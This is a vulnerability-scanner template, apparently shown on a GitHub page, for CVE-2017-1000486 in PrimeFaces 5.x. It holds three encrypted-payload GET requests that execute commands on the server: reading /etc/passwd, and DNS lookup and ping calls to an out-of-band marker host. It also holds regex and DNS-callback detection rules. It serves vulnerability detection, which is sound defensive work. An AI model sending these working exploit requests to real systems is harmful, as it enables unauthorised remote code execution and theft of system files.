-
Notifications
You must be signed in to change notification settings - Fork 10
/
CVE-2017-1000486_Primefaces_RCE.yaml
66 lines (62 loc) · 5.43 KB
/
CVE-2017-1000486_Primefaces_RCE.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
send:
- method: 'GET'
url: "/javax.faces.resource/dynamiccontent.properties.xhtml?pfdrt=sc&cmd=cat%20/etc/passwd&ln=primefaces&pfdri\
d=4xE5s8AClZxUxmyaZjpBstMXUalIgOJHOtvxel/v4YWWwI8VZnuAX1191Sn+CK9NqgRYi2Eqx0Ip7pBmDQy2FwfVxmTHSyueLw8lvBxR9XlJ\
NxZIpqx8JeJdAJadoM6/fTVxHNSrHEo2BWInksdO2JCryCs0gp7fl+yzbivvc/3dqOsENXJSEuj1v8RULfmL9BNWGB1E6kaSzCMHAq50id6wTK\
6l3r3CALrenstFeVs6H8taOicp4rXZB+4n5DEgRgEr36/a+Tfe6SvN82GDvyt80SpIlgsycJpP77l5bHs46I6TPeK9ROZdC2LBwbrPQXl0OGoX\
sH2gQbKts3/JPErN8r5f8zyH9jJ1vYs/lyWVs2WmT0rHDkk+zw75eKkY3YwKYTL0oZFI0sO8w1wRaX+MVV1SjgvHKjkKN9W81WMvP0BrStfCPG\
s1OK/jrApynfsZisXjsgy6vVUlfBlI3/SzeeuunqGDjyhcGLgM1U8/qLM/XBEeC+txkljPWq5ZAfbrN9qtgqJSJD7OzfAtAQbXGHAfB+4emCKv\
Bz0+wehBKRy6HfacUHB+DPj7MON7T9iKV3QZ4Qcs8mCSkhlK6MZfj7zkGHsiTnbqQr+qTVj61Pvr6jHMS4akC7S9u2R5vl9gq8KY5wLv9QpyTG\
Mya3hNS+LQXOzajwXr7mSibFWt5rEnRmQLw28VSTtwxZnyHfSKYyCc/zHgx89ScL6ucsccAAHTolh4n3FBgj1jZmaoJ8eGDAa1l0v3NVYv6j6X\
8cDz5qEx+fcz4ftxUNCaGB/13OaqmdVZXCqGFkGlbbfhzo0BkWBeo4yHxuzXCeLVQZ+hOEqk0jAxVxco97YTW6Yh0/qL+d6IhuAVc7WhH97tDi\
PnRsmSoJ6xPAPxrhdeHiNZoReymXDXPvIUB8BE6dn64MgjAevuN2m1lGVwcwUUem+mwNtJggQ35/FRM7Gfuft1gZTNG+cCuSPD9wT/EYuB7dFE\
9W4d8BzX4X5zNH9d9MyR9tkC33ZlwKbRaBfwTI/RYef1OdOccQKsevIf6RrTbnL0vxzO8aYp6FBq9x2EYdp54PiBFw/mAgKXhSFw0LhebS6LIm\
NLdjV019/TFp81X210RejGkMXix5TWCCqFd3mmMdlbZB5AzeO2H8mh2BAoeUQs15+f2BpwTTcBUFzodJZx0/Ibx781ZD/mdEo9bzCngHer7OUf\
t/BrEE5cdrAaT96Bl0CYqPtDo8m4WvMU4UFpjFQn2JuTe6vEe+Ep6ljjlP33ZzG2SBJW0Ipb/RUAthLfMLYSXuo1MF1vV1Chie4AbZ+RXyxDmG\
ZqykJ7xZpYOdvj2Ap25y1fcy13UOV3YTlj6fJeP3Sd5bosILMp84fnv3eDX4lLjNpNRSnXoKee7XbLu14Hvnf9jjAMv8JDmnjxrCQV1TXA2/8e\
npl0ytV74kU5W0Zs+LuZjldi9oATW4Zj6w=="
- method: 'GET'
url: "/javax.faces.resource/dynamiccontent.properties.xhtml?pfdrt=sc&cmd=getent%20hosts%20DNS_MARKER&ln=primefa\
ces&pfdrid=4xE5s8AClZxUxmyaZjpBstMXUalIgOJHOtvxel/v4YWWwI8VZnuAX1191Sn+CK9NqgRYi2Eqx0Ip7pBmDQy2FwfVxmTHSyueLw8l\
vBxR9XlJNxZIpqx8JeJdAJadoM6/fTVxHNSrHEo2BWInksdO2JCryCs0gp7fl+yzbivvc/3dqOsENXJSEuj1v8RULfmL9BNWGB1E6kaSzCMHAq5\
0id6wTK6l3r3CALrenstFeVs6H8taOicp4rXZB+4n5DEgRgEr36/a+Tfe6SvN82GDvyt80SpIlgsycJpP77l5bHs46I6TPeK9ROZdC2LBwbrPQX\
l0OGoXsH2gQbKts3/JPErN8r5f8zyH9jJ1vYs/lyWVs2WmT0rHDkk+zw75eKkY3YwKYTL0oZFI0sO8w1wRaX+MVV1SjgvHKjkKN9W81WMvP0BrS\
tfCPGs1OK/jrApynfsZisXjsgy6vVUlfBlI3/SzeeuunqGDjyhcGLgM1U8/qLM/XBEeC+txkljPWq5ZAfbrN9qtgqJSJD7OzfAtAQbXGHAfB+4e\
mCKvBz0+wehBKRy6HfacUHB+DPj7MON7T9iKV3QZ4Qcs8mCSkhlK6MZfj7zkGHsiTnbqQr+qTVj61Pvr6jHMS4akC7S9u2R5vl9gq8KY5wLv9Qp\
yTGMya3hNS+LQXOzajwXr7mSibFWt5rEnRmQLw28VSTtwxZnyHfSKYyCc/zHgx89ScL6ucsccAAHTolh4n3FBgj1jZmaoJ8eGDAa1l0v3NVYv6j\
6X8cDz5qEx+fcz4ftxUNCaGB/13OaqmdVZXCqGFkGlbbfhzo0BkWBeo4yHxuzXCeLVQZ+hOEqk0jAxVxco97YTW6Yh0/qL+d6IhuAVc7WhH97tD\
iPnRsmSoJ6xPAPxrhdeHiNZoReymXDXPvIUB8BE6dn64MgjAevuN2m1lGVwcwUUem+mwNtJggQ35/FRM7Gfuft1gZTNG+cCuSPD9wT/EYuB7dFE\
9W4d8BzX4X5zNH9d9MyR9tkC33ZlwKbRaBfwTI/RYef1OdOccQKsevIf6RrTbnL0vxzO8aYp6FBq9x2EYdp54PiBFw/mAgKXhSFw0LhebS6LImN\
LdjV019/TFp81X210RejGkMXix5TWCCqFd3mmMdlbZB5AzeO2H8mh2BAoeUQs15+f2BpwTTcBUFzodJZx0/Ibx781ZD/mdEo9bzCngHer7OUft/\
BrEE5cdrAaT96Bl0CYqPtDo8m4WvMU4UFpjFQn2JuTe6vEe+Ep6ljjlP33ZzG2SBJW0Ipb/RUAthLfMLYSXuo1MF1vV1Chie4AbZ+RXyxDmGZqy\
kJ7xZpYOdvj2Ap25y1fcy13UOV3YTlj6fJeP3Sd5bosILMp84fnv3eDX4lLjNpNRSnXoKee7XbLu14Hvnf9jjAMv8JDmnjxrCQV1TXA2/8enpl0\
ytV74kU5W0Zs+LuZjldi9oATW4Zj6w=="
- method: 'GET'
url: "/javax.faces.resource/dynamiccontent.properties.xhtml?pfdrt=sc&cmd=ping%20-n%201%20DNS_MARKER&ln=primefac\
es&pfdrid=4xE5s8AClZxUxmyaZjpBstMXUalIgOJHOtvxel/v4YWWwI8VZnuAX1191Sn+CK9NqgRYi2Eqx0Ip7pBmDQy2FwfVxmTHSyueLw8lv\
BxR9XlJNxZIpqx8JeJdAJadoM6/fTVxHNSrHEo2BWInksdO2JCryCs0gp7fl+yzbivvc/3dqOsENXJSEuj1v8RULfmL9BNWGB1E6kaSzCMHAq50\
id6wTK6l3r3CALrenstFeVs6H8taOicp4rXZB+4n5DEgRgEr36/a+Tfe6SvN82GDvyt80SpIlgsycJpP77l5bHs46I6TPeK9ROZdC2LBwbrPQXl\
0OGoXsH2gQbKts3/JPErN8r5f8zyH9jJ1vYs/lyWVs2WmT0rHDkk+zw75eKkY3YwKYTL0oZFI0sO8w1wRaX+MVV1SjgvHKjkKN9W81WMvP0BrSt\
fCPGs1OK/jrApynfsZisXjsgy6vVUlfBlI3/SzeeuunqGDjyhcGLgM1U8/qLM/XBEeC+txkljPWq5ZAfbrN9qtgqJSJD7OzfAtAQbXGHAfB+4em\
CKvBz0+wehBKRy6HfacUHB+DPj7MON7T9iKV3QZ4Qcs8mCSkhlK6MZfj7zkGHsiTnbqQr+qTVj61Pvr6jHMS4akC7S9u2R5vl9gq8KY5wLv9Qpy\
TGMya3hNS+LQXOzajwXr7mSibFWt5rEnRmQLw28VSTtwxZnyHfSKYyCc/zHgx89ScL6ucsccAAHTolh4n3FBgj1jZmaoJ8eGDAa1l0v3NVYv6j6\
X8cDz5qEx+fcz4ftxUNCaGB/13OaqmdVZXCqGFkGlbbfhzo0BkWBeo4yHxuzXCeLVQZ+hOEqk0jAxVxco97YTW6Yh0/qL+d6IhuAVc7WhH97tDi\
PnRsmSoJ6xPAPxrhdeHiNZoReymXDXPvIUB8BE6dn64MgjAevuN2m1lGVwcwUUem+mwNtJggQ35/FRM7Gfuft1gZTNG+cCuSPD9wT/EYuB7dFE9\
W4d8BzX4X5zNH9d9MyR9tkC33ZlwKbRaBfwTI/RYef1OdOccQKsevIf6RrTbnL0vxzO8aYp6FBq9x2EYdp54PiBFw/mAgKXhSFw0LhebS6LImNL\
djV019/TFp81X210RejGkMXix5TWCCqFd3mmMdlbZB5AzeO2H8mh2BAoeUQs15+f2BpwTTcBUFzodJZx0/Ibx781ZD/mdEo9bzCngHer7OUft/B\
rEE5cdrAaT96Bl0CYqPtDo8m4WvMU4UFpjFQn2JuTe6vEe+Ep6ljjlP33ZzG2SBJW0Ipb/RUAthLfMLYSXuo1MF1vV1Chie4AbZ+RXyxDmGZqyk\
J7xZpYOdvj2Ap25y1fcy13UOV3YTlj6fJeP3Sd5bosILMp84fnv3eDX4lLjNpNRSnXoKee7XbLu14Hvnf9jjAMv8JDmnjxrCQV1TXA2/8enpl0y\
tV74kU5W0Zs+LuZjldi9oATW4Zj6w=="
detect:
- oob:
- dns
- response:
- body: '[a-z]*:[^:]*:[0-9]*:[0-9]*:[^:]*:\/[^:]*:\/[^:]*'
meta-info:
- title: "CVE-2017-1000486 Primetek Primefaces 5.x remote code execution"
- description: "The vulnerability is due to weak encryption flaw and hardcoded encryption password. As a result, the malicious user may make remote code execution (RCE) via a simple HTTP call."
- type: rce
- threat: 98
- tags:
- Primetek Primefaces 5.x
- CVE-2017-1000486